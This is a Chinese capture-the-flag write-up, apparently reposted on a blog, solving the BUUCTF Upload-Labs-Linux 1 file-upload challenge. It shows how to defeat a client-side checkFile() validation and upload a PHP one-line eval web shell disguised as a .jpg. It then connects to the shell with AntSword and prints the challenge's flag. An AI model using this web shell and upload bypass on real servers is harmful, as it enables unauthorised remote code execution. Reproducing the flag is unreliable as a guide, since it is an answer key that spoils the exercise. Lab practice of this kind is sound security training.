BUUCTF平台练习题Upload-Labs-Linux1 wp_upload-labs-linux 1解题

作者：木道寻08 | 2024-07-19 01:04:01

踩

upload-labs-linux 1解题

环境：kali

工具：中国蚁剑

进入靶机如下：

下载并查看源码：

注意到checkFile()函数

将50行处"return checkFile()"改为"return true"，然后保存。

新建test.php文件，输入木马代码

<?php @eval($_POST[123])?>

然后保存，并重命名为test.php.jpg。

打开html，在Pass-02上传test.php.jpg。

因为文件本身不是jpg格式，所以无法显示。

复制图片地址，然后打开蚁剑，右键选择添加数据，复制地址到URL地址，连接密码为123，点添加。

进入目录，下拉即可看到flag。

得到flag{2bb03dc0-ef84-490c-8a59-c3638797af75}。

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/木道寻08/article/detail/848600